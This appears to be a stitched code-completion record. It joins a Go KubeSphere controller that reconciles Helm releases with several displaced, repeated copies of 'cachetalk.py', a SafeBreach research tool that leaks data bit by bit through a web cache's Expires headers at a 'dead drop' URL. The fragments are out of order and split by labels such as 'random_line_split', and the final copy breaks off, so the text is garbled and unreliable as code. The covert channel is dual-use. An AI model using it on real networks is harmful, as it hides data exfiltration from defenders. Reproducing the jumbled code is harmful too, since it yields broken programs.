limitations under the License.
*/
package helmrelease
import (
"context"
"errors"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/klog"
"kubesphere.io/kubesphere/pkg/apis/application/v1alpha1"
clusterv1alpha1 "kubesphere.io/kubesphere/pkg/apis/cluster/v1alpha1"
"kubesphere.io/kubesphere/pkg/client/informers/externalversions"
"kubesphere.io/kubesphere/pkg/constants"
"kubesphere.io/kubesphere/pkg/simple/client/openpitrix/helmwrapper"
"kubesphere.io/kubesphere/pkg/simple/client/s3"
"kubesphere.io/kubesphere/pkg/utils/clusterclient"
"kubesphere.io/kubesphere/pkg/utils/sliceutil"
"kubesphere.io/kubesphere/pkg/utils/stringutils"
"math"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
"time"
)
const (
HelmReleaseFinalizer = "helmrelease.application.kubesphere.io"
)
var (
ErrGetRepoFailed = errors.New("get repo failed")
ErrGetAppFailed = errors.New("get app failed")
ErrAppVersionDataIsEmpty = errors.New("app version data is empty")
ErrGetAppVersionFailed = errors.New("get app version failed")
ErrLoadChartFailed = errors.New("load chart failed")
ErrS3Config = errors.New("invalid s3 config")
ErrLoadChartFromStorageFailed = errors.New("load chart from storage failed")
)
var _ reconcile.Reconciler = &ReconcileHelmRelease{}
// ReconcileHelmRelease reconciles a HelmRelease object
type ReconcileHelmRelease struct {
StorageClient s3.Interface
KsFactory externalversions.SharedInformerFactory
client.Client
recorder record.EventRecorder
// mock helm install && uninstall
helmMock bool
informer cache.SharedIndexInformer
clusterClients clusterclient.ClusterClients
MultiClusterEnable bool
}
//
// <==>upgrading===================
// | \
// creating===>active=====>deleting=>deleted |
// \ ^ / |
// \ | /======> /
// \=>failed<==========================
// Reconcile reads the state of the cluster for a HelmRelease object and makes changes based on the state read
// and what is in the helmreleases.Spec
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases,verbs=get;list;watch;create;update;patch;delete
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases/status,verbs=get;update;patch
func (r *ReconcileHelmRelease) Reconcile(request reconcile.Request) (reconcile.Result, error) {
// Fetch the helmReleases instance
instance := &v1alpha1.HelmRelease{}
err := r.Get(context.TODO(), request.NamespacedName, instance)
if err != nil {
if apierrors.IsNotFound(err) {
// Object not found, return. Created objects are automatically garbage collected.
// For additional cleanup logic use finalizers.
return reconcile.Result{}, nil
}
// Error reading the object - requeue the request.
return reconcile.Result{}, err
}
if instance.Status.State == "" {
instance.Status.State = v1alpha1.HelmStatusCreating
instance.Status.LastUpdate = metav1.Now()
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
}
if instance.ObjectMeta.DeletionTimestamp.IsZero() {
// The object is not being deleted, so if it does not have our finalizer,
// then let's add the finalizer and update the object.
if !sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
clusterName := instance.GetRlsCluster()
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
// cluster not exists, delete the crd
klog.Warningf("cluster %s not found, delete the helm release %s/%s",
clusterName, instance.GetRlsNamespace(), instance.GetTrueName())
return reconcile.Result{}, r.Delete(context.TODO(), instance)
}
// The host cluster is self-healing; deleting the host cluster must not cause deletion of the helm release
if !r.clusterClients.IsHostCluster(clusterInfo) {
// add owner References
instance.OwnerReferences = append(instance.OwnerReferences, metav1.OwnerReference{
APIVersion: clusterv1alpha1.SchemeGroupVersion.String(),
Kind: clusterv1alpha1.ResourceKindCluster,
Name: clusterInfo.Name,
UID: clusterInfo.UID,
})
}
}
instance.ObjectMeta.Finalizers = append(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer)
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
} else {
// The object is being deleted
if sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
klog.V(3).Infof("helm uninstall %s/%s from host cluster", instance.GetRlsNamespace(), instance.Spec.Name)
err := r.uninstallHelmRelease(instance)
if err != nil {
return reconcile.Result{}, err
}
klog.V(3).Infof("remove helm release %s finalizer", instance.Name)
// remove finalizer
instance.ObjectMeta.Finalizers = sliceutil.RemoveString(instance.ObjectMeta.Finalizers, func(item string) bool {
if item == HelmReleaseFinalizer {
return true
}
return false
})
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
}
return reconcile.Result{}, nil
}
return r.reconcile(instance)
}
// Check the state of the instance then decide what to do.
func (r *ReconcileHelmRelease) reconcile(instance *v1alpha1.HelmRelease) (reconcile.Result, error) {
if instance.Status.State == v1alpha1.HelmStatusActive && instance.Status.Version == instance.Spec.Version {
// todo check release status
return reconcile.Result{}, nil
}
ft := failedTimes(instance.Status.DeployStatus)
if v1alpha1.HelmStatusFailed == instance.Status.State && ft > 0 {
// failed too many times: exponential backoff, max delay 180s
retryAfter := time.Duration(math.Min(math.Exp2(float64(ft)), 180)) * time.Second
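// e.g. one failure waits 2s, three failures wait 8s; from the 8th failure onward the delay stays at the 180s cap.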
var lastDeploy time.Time
if instance.Status.LastDeployed != nil {
lastDeploy = instance.Status.LastDeployed.Time
} else {
lastDeploy = instance.Status.LastUpdate.Time
}
if time.Now().Before(lastDeploy.Add(retryAfter)) {
return reconcile.Result{RequeueAfter: retryAfter}, nil
}
}
var err error
switch instance.Status.State {
case v1alpha1.HelmStatusDeleting:
// no operation
return reconcile.Result{}, nil
case v1alpha1.HelmStatusActive:
// Release used to be active, but instance.Status.Version is not equal to instance.Spec.Version
instance.Status.State = v1alpha1.HelmStatusUpgrading
// Update the state first.
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
case v1alpha1.HelmStatusCreating:
// create new release
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusFailed:
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusUpgrading:
// We can update the release now.
err = r.createOrUpgradeHelmRelease(instance, true)
case v1alpha1.HelmStatusRollbacking:
// TODO: rollback helm release
}
now := metav1.Now()
var deployStatus v1alpha1.HelmReleaseDeployStatus
if err != nil {
instance.Status.State = v1alpha1.HelmStatusFailed
instance.Status.Message = stringutils.ShortenString(err.Error(), v1alpha1.MsgLen)
deployStatus.Message = instance.Status.Message
deployStatus.State = v1alpha1.HelmStatusFailed
} else {
instance.Status.State = v1alpha1.StateActive
instance.Status.Message = ""
instance.Status.Version = instance.Spec.Version
deployStatus.State = v1alpha1.HelmStatusSuccessful
}
deployStatus.Time = now
instance.Status.LastUpdate = now
instance.Status.LastDeployed = &now
if len(instance.Status.DeployStatus) > 0 {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus}, instance.Status.DeployStatus...)
// At most ten records will be saved.
if len(instance.Status.DeployStatus) >= 10 {
instance.Status.DeployStatus = instance.Status.DeployStatus[:10:10]
}
} else {
instance.Status.DeployStatus = []v1alpha1.HelmReleaseDeployStatus{deployStatus}
}
err = r.Status().Update(context.TODO(), instance)
if err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
func failedTimes(status []v1alpha1.HelmReleaseDeployStatus) int {
count := 0
for i := range status {
if status[i].State == v1alpha1.HelmStatusFailed {
count += 1
}
}
return count
}
func (r *ReconcileHelmRelease) createOrUpgradeHelmRelease(rls *v1alpha1.HelmRelease, upgrade bool) error |
func (r *ReconcileHelmRelease) uninstallHelmRelease(rls *v1alpha1.HelmRelease) error {
if rls.Status.State != v1alpha1.HelmStatusDeleting {
rls.Status.State = v1alpha1.HelmStatusDeleting
rls.Status.LastUpdate = metav1.Now()
err := r.Status().Update(context.TODO(), rls)
if err != nil {
return err
}
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
var err error
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
klog.V(2).Infof("cluster %s was deleted, skip helm release uninstall", clusterName)
return nil
}
// If the user deletes the helmRelease first and then deletes the cluster immediately, helm resources may leak.
if clusterInfo.DeletionTimestamp != nil {
klog.V(2).Infof("cluster %s is deleting, skip helm release uninstall", clusterName)
return nil
}
clusterConfig = string(clusterInfo.Spec.Connection.KubeConfig)
}
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name, helmwrapper.SetMock(r.helmMock))
res, err := hw.Uninstall()
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) SetupWithManager(mgr ctrl.Manager) error {
r.Client = mgr.GetClient()
if r.KsFactory != nil && r.MultiClusterEnable {
r.clusterClients = clusterclient.NewClusterClient(r.KsFactory.Cluster().V1alpha1().Clusters())
}
return ctrl.NewControllerManagedBy(mgr).
For(&v1alpha1.HelmRelease{}).
Complete(r)
}
| {
var chartData []byte
var err error
_, chartData, err = r.GetChartData(rls)
if err != nil {
return err
}
if len(chartData) == 0 {
klog.Errorf("empty chart data failed, release name %s, chart name: %s", rls.Name, rls.Spec.ChartName)
return ErrAppVersionDataIsEmpty
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
if r.MultiClusterEnable && clusterName != "" {
clusterConfig, err = r.clusterClients.GetClusterKubeconfig(clusterName)
if err != nil {
klog.Errorf("get cluster %s config failed", clusterConfig)
return err
}
}
// If clusterConfig is empty, this application will be installed in current host.
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name,
// We just add kubesphere.io/creator annotation now.
helmwrapper.SetAnnotations(map[string]string{constants.CreatorAnnotationKey: rls.GetCreator()}),
helmwrapper.SetMock(r.helmMock))
var res helmwrapper.HelmRes
if upgrade {
res, err = hw.Upgrade(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
} else {
res, err = hw.Install(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
}
if err != nil {
return errors.New(res.Message)
}
return nil
} | identifier_body |
cachetalk.py | #!/usr/bin/env python
# Copyright (c) 2016, SafeBreach
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import urllib2
import argparse
import time
import datetime
import email.utils
import binascii
import csv
import multiprocessing.pool
####################
# Global Variables #
####################
__version__ = "1.0"
__author__ = "Itzik Kotler"
__copyright__ = "Copyright 2016, SafeBreach"
#############
# Functions #
#############
def __wait_till_next_minute():
sleeptime = 60 - datetime.datetime.utcnow().second
time.sleep(sleeptime)
def __calc_delta(expires_field, date_field):
now_date = datetime.datetime(*email.utils.parsedate(date_field)[:6])
expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
return expires_date - now_date
def __str2bits(string):
bits = []
if string.startswith('0b'):
bits = list(string[2:])
else:
# Convert text to binary, use the str repr to convert to list, skip 2 bytes to jump over '0b' prefix
bits = list(bin(int(binascii.hexlify(string), 16)))[2:]
# We're using .pop() so it's reverse() the order of the list
bits.reverse()
return bits
def main(args):
parser = argparse.ArgumentParser(prog='cachetalk')
parser.add_argument('url', metavar='URL', type=str, help='dead drop URL')
parser.add_argument('poll_interval', metavar='SECONDS', nargs='?', type=int,
help='polling intervals (i.e. the delta)')
parser.add_argument('-s', '--always-sync', action='store_true', help='always start on the top of the minute')
parser.add_argument('-f', '--force-start', action='store_true', help='start immediately without synchronizing')
parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')
parser.add_argument('-q', '--quiet', action='store_true', help='less output')
parser.add_argument('-1', '--try-once', action='store_true', help='try to write once and stop')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-w', '--write', nargs=1, type=str, metavar='DATA', help='connect to URL and write DATA')
group.add_argument('-r', '--read', nargs=1, type=int, metavar='LEN', help='monitor URL and read LEN amount of bits')
group.add_argument('-t', '--test', action='store_true', help='print HTTP Server Expires and calculate the delta') |
if args.verbose:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPHandler(debuglevel=1)))
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(debuglevel=1)))
req_headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
req = urllib2.Request(args.url, headers=req_headers)
if args.batch:
print "START BATCH MODE"
pool = multiprocessing.pool.ThreadPool(processes=8)
threads = []
batch_mode = args.batch[1].lower()
results = []
with open(args.batch[0], 'r') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
batch_argv = [sys.argv[0], '-1', '-s']
if batch_mode == 'r':
batch_argv.append('-r 1')
else:
batch_argv.append('-w0b' + row[2])
batch_argv.append(row[0])
batch_argv.append(row[1])
print "Calling Thread w/ %s" % (batch_argv[1:])
threads.append(pool.apply_async(main,(batch_argv,)))
for result in threads:
results.append(result.get())
# That's what happens when you commit code the night before the talk ;-)
results = reduce(lambda x,y: x+y, map(lambda x: str(x), reduce(lambda x,y: x+y, results)))
print "END OF BATCH MODE\n\n"
print ">>> RESULT: %s <<<" % results
elif args.test:
# Test-mode
try:
http_response = urllib2.urlopen(req)
http_response.read()
print '\n' + args.url + ':'
print "=" * (len(args.url) + 1) + '\n'
print "Expires equal to: %s" % http_response.headers['Expires']
print "Date equal to: %s\n" % http_response.headers['Date']
# Every hit changes Expires? Can't use URL for cache talking ...
if http_response.headers['Expires'] == http_response.headers['Date']:
print "NOT GOOD!"
else:
print "MAYBE ... (DELTA equals %s)" % __calc_delta(http_response.headers['Expires'],
http_response.headers['Date'])
except TypeError:
# expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
# TypeError: 'NoneType' object has no attribute '__getitem__'
print "`Expires' Value is Number and not a Date! Can't calculate delta ...\n"
except KeyError:
# Maybe it's not Expires?
print "Can't find `Expires' Header in HTTP Response ...\n"
except urllib2.HTTPError as e:
# Connection error
print "ERROR: %s for %s" % (str(e), args.url)
else:
# Write/Read Mode
first_sync = args.force_start
bits = []
if not args.read:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- INPUT (%s) ---" % args.write[0]
print ''.join(bits)
print "--- INPUT = %d BITS --" % (len(bits))
initial_poll_interval = args.poll_interval
last_input_bit = -1
last_poll_interval = -1
after_fp = False
sliding_delta = 0
if args.read:
if args.poll_interval < 11:
sliding_delta = 1
else:
sliding_delta = 10
args.poll_interval = args.poll_interval + sliding_delta
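# The reader polls sliding_delta seconds later than the writer's interval so the
# writer's request (if any) has already refreshed the cached Expires header
# before the reader samples it.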
while True:
if not first_sync or args.always_sync:
if not args.quiet:
print "[%s]: Synchronizing ..." % time.asctime()
__wait_till_next_minute()
first_sync = True
print "[%s]: Synchronized! Need to sleep another %d second(s) ..." % (time.asctime(), args.poll_interval)
time.sleep(args.poll_interval)
print "[%s]: Work time!" % time.asctime()
observed_delta = None
if args.read:
# Read: append a bit to the bits array depending on the HTTP response
input_bit = 0
http_response = urllib2.urlopen(req)
http_response.read()
# Negative delta? (Minus sliding_delta, as read interval is always + sliding_delta to give the writer a buffer)
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
if observed_delta.total_seconds() < args.poll_interval - sliding_delta:
input_bit = 1
print "(READING | R#: %d | E: %s | D: %s | D2: %s): BIT %d" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds(), input_bit)
if last_input_bit == 0 and input_bit == 1 and last_poll_interval == observed_delta.total_seconds():
args.poll_interval = observed_delta.total_seconds()
print "*** FALSE POSITIVE! (Ignored; Changed to 0)"
bits.append(0)
last_input_bit = 0
after_fp = True
else:
args.poll_interval = observed_delta.total_seconds() + (sliding_delta + 1)
if after_fp:
# After False-positive and bit 1? Writer back online!
if input_bit == 1:
after_fp = False
else:
# After False-positive and bit 0? It's still False-positive ... Go back to original cycle!
args.poll_interval = initial_poll_interval
bits.append(input_bit)
last_input_bit = input_bit
last_poll_interval = args.poll_interval - (sliding_delta + 1)
if len(bits) == args.read[0]:
break
else:
# Write: pop a bit from the bits array
try:
output_bit = bits.pop()
if output_bit == '0':
print "(WRITING | R#: =OFFLINE= | E: =OFFLINE= | D: =OFFLINE=): BIT 0"
if len(bits) == 0:
break
continue
while True:
http_response = urllib2.urlopen(req)
http_response.read()
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
print "(WRITING | R#: %d | E: %s | D: %s | D2: %s): BIT 1" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds())
if observed_delta.total_seconds() != args.poll_interval and not args.try_once:
print "*** RETRY!"
retry_sleep = observed_delta.total_seconds()
if retry_sleep == 0:
retry_sleep = 1
time.sleep(retry_sleep)
continue
# Do-while Writer is not aligned w/ Expires
break
if len(bits) == 0:
break
except IndexError:
break
if not args.quiet:
print "!!! EOF !!!"
if not bits:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- OUTPUT ---"
print ''.join(map(str, bits))
print "--- OUTPUT = %d BITS --" % (len(bits))
print " "
n = int(''.join(map(str, bits)), 2)
try:
print binascii.unhexlify('%x' % n)
except TypeError:
# TypeError: Odd-length string if n = 0 or 1
if len(bits) == 1:
pass
else:
raise
return bits
###############
# Entry Point #
###############
if __name__ == "__main__":
sys.exit(main(sys.argv)) | group.add_argument('-b', '--batch', nargs=2, type=str, metavar=('FILE.CSV', 'R|W'), help='In batch mode you can supply a file with a list of URLs, DELTAs, and 1/0\'s')
args = parser.parse_args(args=args[1:])
if not args.url.startswith('http'):
args.url = 'http://' + args.url | random_line_split |
cachetalk.py | #!/usr/bin/env python
# Copyright (c) 2016, SafeBreach
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import urllib2
import argparse
import time
import datetime
import email.utils
import binascii
import csv
import multiprocessing.pool
####################
# Global Variables #
####################
__version__ = "1.0"
__author__ = "Itzik Kotler"
__copyright__ = "Copyright 2016, SafeBreach"
#############
# Functions #
#############
def __wait_till_next_minute():
sleeptime = 60 - datetime.datetime.utcnow().second
time.sleep(sleeptime)
def __calc_delta(expires_field, date_field):
now_date = datetime.datetime(*email.utils.parsedate(date_field)[:6])
expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
return expires_date - now_date
def __str2bits(string):
bits = []
if string.startswith('0b'):
bits = list(string[2:])
else:
# Convert text to binary, use the str repr to convert to list, skip 2 bytes to jump over '0b' prefix
bits = list(bin(int(binascii.hexlify(string), 16)))[2:]
# We're using .pop() so it's reverse() the order of the list
bits.reverse()
return bits
def main(args):
parser = argparse.ArgumentParser(prog='cachetalk')
parser.add_argument('url', metavar='URL', type=str, help='dead drop URL')
parser.add_argument('poll_interval', metavar='SECONDS', nargs='?', type=int,
help='polling intervals (i.e. the delta)')
parser.add_argument('-s', '--always-sync', action='store_true', help='always start on the top of the minute')
parser.add_argument('-f', '--force-start', action='store_true', help='start immediately without synchronizing')
parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')
parser.add_argument('-q', '--quiet', action='store_true', help='less output')
parser.add_argument('-1', '--try-once', action='store_true', help='try to write once and stop')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-w', '--write', nargs=1, type=str, metavar='DATA', help='connect to URL and write DATA')
group.add_argument('-r', '--read', nargs=1, type=int, metavar='LEN', help='monitor URL and read LEN amount of bits')
group.add_argument('-t', '--test', action='store_true', help='print HTTP Server Expires and calculate the delta')
group.add_argument('-b', '--batch', nargs=2, type=str, metavar=('FILE.CSV', 'R|W'), help='In batch mode you can supply a file with a list of URLs, DELTAs, and 1/0\'s')
args = parser.parse_args(args=args[1:])
if not args.url.startswith('http'):
args.url = 'http://' + args.url
if args.verbose:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPHandler(debuglevel=1)))
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(debuglevel=1)))
req_headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
req = urllib2.Request(args.url, headers=req_headers)
if args.batch:
print "START BATCH MODE"
pool = multiprocessing.pool.ThreadPool(processes=8)
threads = []
batch_mode = args.batch[1].lower()
results = []
with open(args.batch[0], 'r') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
batch_argv = [sys.argv[0], '-1', '-s']
if batch_mode == 'r':
batch_argv.append('-r 1')
else:
batch_argv.append('-w0b' + row[2])
batch_argv.append(row[0])
batch_argv.append(row[1])
print "Calling Thread w/ %s" % (batch_argv[1:])
threads.append(pool.apply_async(main,(batch_argv,)))
for result in threads:
results.append(result.get())
# That's what happens when you commit code the night before the talk ;-)
results = reduce(lambda x,y: x+y, map(lambda x: str(x), reduce(lambda x,y: x+y, results)))
print "END OF BATCH MODE\n\n"
print ">>> RESULT: %s <<<" % results
elif args.test:
# Test-mode
try:
http_response = urllib2.urlopen(req)
http_response.read()
print '\n' + args.url + ':'
print "=" * (len(args.url) + 1) + '\n'
print "Expires equal to: %s" % http_response.headers['Expires']
print "Date equal to: %s\n" % http_response.headers['Date']
# Every hit changes Expires? Can't use URL for cache talking ...
if http_response.headers['Expires'] == http_response.headers['Date']:
print "NOT GOOD!"
else:
print "MAYBE ... (DELTA equals %s)" % __calc_delta(http_response.headers['Expires'],
http_response.headers['Date'])
except TypeError:
# expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
# TypeError: 'NoneType' object has no attribute '__getitem__'
print "`Expires' Value is Number and not a Date! Can't calculate delta ...\n"
except KeyError:
# Maybe it's not Expires?
print "Can't find `Expires' Header in HTTP Response ...\n"
except urllib2.HTTPError as e:
# Connection error
print "ERROR: %s for %s" % (str(e), args.url)
else:
# Write/Read Mode
first_sync = args.force_start
bits = []
if not args.read:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- INPUT (%s) ---" % args.write[0]
print ''.join(bits)
print "--- INPUT = %d BITS --" % (len(bits))
initial_poll_interval = args.poll_interval
last_input_bit = -1
last_poll_interval = -1
after_fp = False
sliding_delta = 0
if args.read:
if args.poll_interval < 11:
sliding_delta = 1
else:
sliding_delta = 10
args.poll_interval = args.poll_interval + sliding_delta
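# The reader polls sliding_delta seconds later than the writer's interval so the
# writer's request (if any) has already refreshed the cached Expires header
# before the reader samples it.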
while True:
if not first_sync or args.always_sync:
if not args.quiet:
print "[%s]: Synchronizing ..." % time.asctime()
__wait_till_next_minute()
first_sync = True
print "[%s]: Synchronized! Need to sleep another %d second(s) ..." % (time.asctime(), args.poll_interval)
time.sleep(args.poll_interval)
print "[%s]: Work time!" % time.asctime()
observed_delta = None
if args.read:
# Read: append a bit to the bits array depending on the HTTP response
input_bit = 0
http_response = urllib2.urlopen(req)
http_response.read()
# Negative delta? (Minus sliding_delta, as read interval is always + sliding_delta to give the writer a buffer)
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
if observed_delta.total_seconds() < args.poll_interval - sliding_delta:
input_bit = 1
print "(READING | R#: %d | E: %s | D: %s | D2: %s): BIT %d" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds(), input_bit)
if last_input_bit == 0 and input_bit == 1 and last_poll_interval == observed_delta.total_seconds():
args.poll_interval = observed_delta.total_seconds()
print "*** FALSE POSITIVE! (Ignored; Changed to 0)"
bits.append(0)
last_input_bit = 0
after_fp = True
else:
args.poll_interval = observed_delta.total_seconds() + (sliding_delta + 1)
if after_fp:
# After False-positive and bit 1? Writer back online!
|
bits.append(input_bit)
last_input_bit = input_bit
last_poll_interval = args.poll_interval - (sliding_delta + 1)
if len(bits) == args.read[0]:
break
else:
# Write: pop a bit from the bits array
try:
output_bit = bits.pop()
if output_bit == '0':
print "(WRITING | R#: =OFFLINE= | E: =OFFLINE= | D: =OFFLINE=): BIT 0"
if len(bits) == 0:
break
continue
while True:
http_response = urllib2.urlopen(req)
http_response.read()
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
print "(WRITING | R#: %d | E: %s | D: %s | D2: %s): BIT 1" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds())
if observed_delta.total_seconds() != args.poll_interval and not args.try_once:
print "*** RETRY!"
retry_sleep = observed_delta.total_seconds()
if retry_sleep == 0:
retry_sleep = 1
time.sleep(retry_sleep)
continue
# Do-while Writer is not aligned w/ Expires
break
if len(bits) == 0:
break
except IndexError:
break
if not args.quiet:
print "!!! EOF !!!"
if not bits:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- OUTPUT ---"
print ''.join(map(str, bits))
print "--- OUTPUT = %d BITS --" % (len(bits))
print " "
n = int(''.join(map(str, bits)), 2)
try:
print binascii.unhexlify('%x' % n)
except TypeError:
# TypeError: Odd-length string if n = 0 or 1
if len(bits) == 1:
pass
else:
raise
return bits
###############
# Entry Point #
###############
if __name__ == "__main__":
sys.exit(main(sys.argv))
| if input_bit == 1:
after_fp = False
else:
# After False-positive and bit 0? It's still False-positive ... Go back to original cycle!
args.poll_interval = initial_poll_interval | conditional_block |
cachetalk.py | #!/usr/bin/env python
# Copyright (c) 2016, SafeBreach
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import urllib2
import argparse
import time
import datetime
import email.utils
import binascii
import csv
import multiprocessing.pool
####################
# Global Variables #
####################
__version__ = "1.0"
__author__ = "Itzik Kotler"
__copyright__ = "Copyright 2016, SafeBreach"
#############
# Functions #
